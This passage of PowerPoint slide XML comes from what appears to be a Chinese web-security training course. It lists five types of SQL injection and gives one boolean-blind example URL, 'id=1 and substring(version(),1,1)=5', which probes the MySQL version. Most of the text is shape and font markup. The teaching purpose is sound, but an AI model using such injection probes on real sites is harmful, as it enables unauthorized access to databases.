                  <a:pt x="522" y="260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="519" y="263"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="707" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="707" y="719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="711" y="719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="716" y="716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="718" y="713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719" y="707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="718" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="716" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="711" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="707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6530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2F4CD337-3BE7-0A4A-98DE-7AA8618CD6A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048397" y="4476784"/>
            <a:ext cx="6095206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zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:ea typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:cs typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t>扫码试看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:ea typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:cs typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:ea typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:cs typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t>订阅</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
              <a:ea typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
              <a:cs typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
              <a:ea typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
              <a:cs typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:ea typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:cs typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t>《Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:ea typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:cs typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t> 安全攻防实战</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:ea typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:cs typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t>》</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:ea typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:cs typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t>视频课程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BB5B18B-4632-5B46-8087-CF3F8F6B5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4421" y="1473626"/>
            <a:ext cx="3003158" cy="3003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79762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CED99-4025-2743-9E47-0910E9C34221}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="363415" y="306601"/>
            <a:ext cx="4796414" cy="55772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err="1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认识SQL注入的不同类型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="32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6068DB0-0E34-0648-8A70-B6AAAE455749}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-355600" y="1122363"/>
            <a:ext cx="12547600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150" cmpd="sng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1361889" y="1572964"/>
            <a:ext cx="6976641" cy="31827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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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注入主要分为以下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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种</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D4999"/>
              </a:solidFill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  <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"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Boolean-based blind SQL injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="e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（</a:t>
            </a:r>
            <a:r>
              <a:rPr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布尔型注入）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"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UNION query SQL injection</a:t>
            </a:r>
            <a:r>
              <a:rPr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（可联合查询注入）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"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Time-based blind SQL injection</a:t>
            </a:r>
            <a:r>
              <a:rPr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（基于时间延迟注入）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"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Error-based SQL injection</a:t>
            </a:r>
            <a:r>
              <a:rPr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（报错型注入）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"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altLang="zh-CN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Stacked queries SQL injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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（可多语句查询注入）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"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</p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="Group 131">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5DB7E3E-6C7A-D64D-B908-FF66A6916658}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="798597" y="1734429"/>
            <a:ext cx="433767" cy="433767"/>
            <a:chOff x="1902319" y="1507871"/>
            <a:chExt cx="938512" cy="938512"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="19" name="Group 132">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20BE2478-C7F2-D242-98FD-9DD83D44F940}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2136408" y="1764045"/>
              <a:ext cx="470334" cy="426157"/>
              <a:chOff x="6448425" y="796925"/>
              <a:chExt cx="287338" cy="260350"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="accent5"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="22" name="Freeform 3562">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{196F376B-873D-0A41-9256-4E6BFD61DA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8425" y="796925"/>
                <a:ext cx="277812" cy="161925"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 8 w 701"/>
                  <a:gd name="T1" fmla="*/ 285 h 408"/>
                  <a:gd name="T2" fmla="*/ 5 w 701"/>
                  <a:gd name="T3" fmla="*/ 288 h 408"/>
                  <a:gd name="T4" fmla="*/ 2 w 701"/>
                  <a:gd name="T5" fmla="*/ 290 h 408"/>
                  <a:gd name="T6" fmla="*/ 1 w 701"/>
                  <a:gd name="T7" fmla="*/ 293 h 408"/>
                  <a:gd name="T8" fmla="*/ 0 w 701"/>
                  <a:gd name="T9" fmla="*/ 297 h 408"/>
                  <a:gd name="T10" fmla="*/ 1 w 701"/>
                  <a:gd name="T11" fmla="*/ 300 h 408"/>
                  <a:gd name="T12" fmla="*/ 2 w 701"/>
                  <a:gd name="T13" fmla="*/ 303 h 408"/>
                  <a:gd name="T14" fmla="*/ 5 w 701"/>
                  <a:gd name="T15" fmla="*/ 306 h 408"/>
                  <a:gd name="T16" fmla="*/ 8 w 701"/>
                  <a:gd name="T17" fmla="*/ 308 h 408"/>
                  <a:gd name="T18" fmla="*/ 259 w 701"/>
                  <a:gd name="T19" fmla="*/ 408 h 408"/>
                  <a:gd name="T20" fmla="*/ 701 w 701"/>
                  <a:gd name="T21" fmla="*/ 0 h 408"/>
                  <a:gd name="T22" fmla="*/ 8 w 701"/>
                  <a:gd name="T23" fmla="*/ 285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01" h="408">
                    <a:moveTo>
                      <a:pt x="8" y="285"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="5" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="297"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="408"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="701" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="285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accent5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23" name="Freeform 3563">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCED5EA6-1AB4-BD43-967F-C970198B21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788" y="800100"/>
                <a:ext cx="180975" cy="257175"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 456"/>
                  <a:gd name="T1" fmla="*/ 424 h 646"/>
                  <a:gd name="T2" fmla="*/ 0 w 456"/>
                  <a:gd name="T3" fmla="*/ 635 h 646"/>
                  <a:gd name="T4" fmla="*/ 0 w 456"/>
                  <a:gd name="T5" fmla="*/ 639 h 646"/>
                  <a:gd name="T6" fmla="*/ 3 w 456"/>
                  <a:gd name="T7" fmla="*/ 642 h 646"/>
                  <a:gd name="T8" fmla="*/ 5 w 456"/>
                  <a:gd name="T9" fmla="*/ 645 h 646"/>
                  <a:gd name="T10" fmla="*/ 9 w 456"/>
                  <a:gd name="T11" fmla="*/ 646 h 646"/>
                  <a:gd name="T12" fmla="*/ 11 w 456"/>
                  <a:gd name="T13" fmla="*/ 646 h 646"/>
                  <a:gd name="T14" fmla="*/ 12 w 456"/>
                  <a:gd name="T15" fmla="*/ 646 h 646"/>
                  <a:gd name="T16" fmla="*/ 16 w 456"/>
                  <a:gd name="T17" fmla="*/ 646 h 646"/>
                  <a:gd name="T18" fmla="*/ 18 w 456"/>
                  <a:gd name="T19" fmla="*/ 645 h 646"/>
                  <a:gd name="T20" fmla="*/ 21 w 456"/>
                  <a:gd name="T21" fmla="*/ 644 h 646"/>
                  <a:gd name="T22" fmla="*/ 22 w 456"/>
                  <a:gd name="T23" fmla="*/ 641 h 646"/>
                  <a:gd name="T24" fmla="*/ 126 w 456"/>
                  <a:gd name="T25" fmla="*/ 469 h 646"/>
                  <a:gd name="T26" fmla="*/ 315 w 456"/>
                  <a:gd name="T27" fmla="*/ 569 h 646"/>
                  <a:gd name="T28" fmla="*/ 317 w 456"/>
                  <a:gd name="T29" fmla="*/ 570 h 646"/>
                  <a:gd name="T30" fmla="*/ 320 w 456"/>
                  <a:gd name="T31" fmla="*/ 572 h 646"/>
                  <a:gd name="T32" fmla="*/ 323 w 456"/>
                  <a:gd name="T33" fmla="*/ 570 h 646"/>
                  <a:gd name="T34" fmla="*/ 325 w 456"/>
                  <a:gd name="T35" fmla="*/ 570 h 646"/>
                  <a:gd name="T36" fmla="*/ 329 w 456"/>
                  <a:gd name="T37" fmla="*/ 567 h 646"/>
                  <a:gd name="T38" fmla="*/ 332 w 456"/>
                  <a:gd name="T39" fmla="*/ 561 h 646"/>
                  <a:gd name="T40" fmla="*/ 456 w 456"/>
                  <a:gd name="T41" fmla="*/ 0 h 646"/>
                  <a:gd name="T42" fmla="*/ 0 w 456"/>
                  <a:gd name="T43" fmla="*/ 424 h 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56" h="646">
                    <a:moveTo>
                      <a:pt x="0" y="424"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="639"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="642"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="644"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="469"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="569"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="570"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323" y="570"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="570"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="329" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="332" y="561"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="456" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="424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accent5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sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Oval 133">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F8D51B6-05FA-7649-A526-77E66AF12DE8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1902319" y="1507871"/>
              <a:ext cx="938512" cy="938512"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="1D49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0510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CED99-4025-2743-9E47-0910E9C34221}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="363415" y="306601"/>
            <a:ext cx="4796414" cy="55772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err="1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认识SQL注入的不同类型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="32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6068DB0-0E34-0648-8A70-B6AAAE455749}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-355600" y="1122363"/>
            <a:ext cx="12547600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150" cmpd="sng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1625611" y="1545256"/>
            <a:ext cx="6976641" cy="6624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Boolean-based</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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（布尔型注入）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D4999"/>
              </a:solidFill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C23BC1-A326-064A-92FE-C8B0FD431769}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm rot="5283976" flipH="1">
            <a:off x="805684" y="2715387"/>
            <a:ext cx="379412" cy="381000"/>
            <a:chOff x="3552" y="960"/>
            <a:chExt cx="215" cy="182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FA5EEC6-B242-C14A-B35F-5A14F89779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8" y="960"/>
              <a:ext cx="119" cy="182"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 212 w 262"/>
                <a:gd name="T1" fmla="*/ 374 h 375"/>
                <a:gd name="T2" fmla="*/ 261 w 262"/>
                <a:gd name="T3" fmla="*/ 316 h 375"/>
                <a:gd name="T4" fmla="*/ 0 w 262"/>
                <a:gd name="T5" fmla="*/ 0 h 375"/>
                <a:gd name="T6" fmla="*/ 212 w 262"/>
                <a:gd name="T7" fmla="*/ 374 h 37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2"/>
                <a:gd name="T13" fmla="*/ 0 h 375"/>
                <a:gd name="T14" fmla="*/ 262 w 262"/>
                <a:gd name="T15" fmla="*/ 375 h 37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2" h="375">
                  <a:moveTo>
                    <a:pt x="212" y="374"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="261" y="316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212" y="374"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:gradFill rotWithShape="0">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="764700"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="FF9900"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="2700000" scaled="1"/>
            </a:gradFill>
            <a:ln w="12700" cap="rnd">
              <a:solidFill>
                <a:srgbClr val="F2BF5A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20FEA43C-0851-7845-A28F-CDA60BF16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2" y="960"/>
              <a:ext cx="194" cy="182"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 426"/>
                <a:gd name="T1" fmla="*/ 374 h 375"/>
                <a:gd name="T2" fmla="*/ 425 w 426"/>
                <a:gd name="T3" fmla="*/ 374 h 375"/>
                <a:gd name="T4" fmla="*/ 213 w 426"/>
                <a:gd name="T5" fmla="*/ 0 h 375"/>
                <a:gd name="T6" fmla="*/ 0 w 426"/>
                <a:gd name="T7" fmla="*/ 374 h 37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26"/>
                <a:gd name="T13" fmla="*/ 0 h 375"/>
                <a:gd name="T14" fmla="*/ 426 w 426"/>
                <a:gd name="T15" fmla="*/ 375 h 37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26" h="375">
                  <a:moveTo>
                    <a:pt x="0" y="374"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="425" y="374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="374"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:gradFill rotWithShape="0">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="764700"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="FF9900"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="2700000" scaled="1"/>
            </a:gradFill>
            <a:ln w="12700" cap="rnd">
              <a:solidFill>
                <a:srgbClr val="F2BF5A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latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRP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F09263E3-2005-124A-9E19-1B8697D055AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1625611" y="2626730"/>
            <a:ext cx="7325015" cy="1895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http://</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1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test.com</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en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/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1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view?id</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en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=1 and substring(version(),1,1)=5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="2000" dirty="0"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如果服务端</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en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MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US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版本是</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US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5.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en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X</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US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的话，那么页面返回的内容就会跟正常请求一样。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="Group 131">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4C9C25D-69EE-FC42-888A-A8D974EA45A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="798597" y="1734429"/>
            <a:ext cx="433767" cy="433767"/>
            <a:chOff x="1902319" y="1507871"/>
            <a:chExt cx="938512" cy="938512"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="15" name="Group 132">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E383C7CB-03A8-EB49-834C-A56C6BCB7A68}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2136408" y="1764045"/>
              <a:ext cx="470334" cy="426157"/>
              <a:chOff x="6448425" y="796925"/>
              <a:chExt cx="287338" cy="260350"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="accent5"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="17" name="Freeform 3562">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C2C362E-A09D-B848-9038-25424A40B5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8425" y="796925"/>
                <a:ext cx="277812" cy="161925"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 8 w 701"/>
                  <a:gd name="T1" fmla="*/ 285 h 408"/>
                  <a:gd name="T2" fmla="*/ 5 w 701"/>
                  <a:gd name="T3" fmla="*/ 288 h 408"/>
                  <a:gd name="T4" fmla="*/ 2 w 701"/>
                  <a:gd name="T5" fmla="*/ 290 h 408"/>
                  <a:gd name="T6" fmla="*/ 1 w 701"/>
                  <a:gd name="T7" fmla="*/ 293 h 408"/>
                  <a:gd name="T8" fmla="*/ 0 w 701"/>
                  <a:gd name="T9" fmla="*/ 297 h 408"/>
                  <a:gd name="T10" fmla="*/ 1 w 701"/>
                  <a:gd name="T11" fmla="*/ 300 h 408"/>
                  <a:gd name="T12" fmla="*/ 2 w 701"/>
                  <a:gd name="T13" fmla="*/ 303 h 408"/>
                  <a:gd name="T14" fmla="*/ 5 w 701"/>
                  <a:gd name="T15" fmla="*/ 306 h 408"/>
                  <a:gd name="T16" fmla="*/ 8 w 701"/>
                  <a:gd name="T17" fmla="*/ 308 h 408"/>
                  <a:gd name="T18" fmla="*/ 259 w 701"/>
                  <a:gd name="T19" fmla="*/ 408 h 408"/>
                  <a:gd name="T20" fmla="*/ 701 w 701"/>
                  <a:gd name="T21" fmla="*/ 0 h 408"/>
                  <a:gd name="T22" fmla="*/ 8 w 701"/>
                  <a:gd name="T23" fmla="*/ 285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01" h="408">
                    <a:moveTo>
                      <a:pt x="8" y="285"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="5" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="297"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="408"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="701" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="285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accent5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8" name="Freeform 3563">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BBDF053-9C9D-4E43-89BC-5C365AA1DC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788" y="800100"/>
                <a:ext cx="180975" cy="257175"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 456"/>
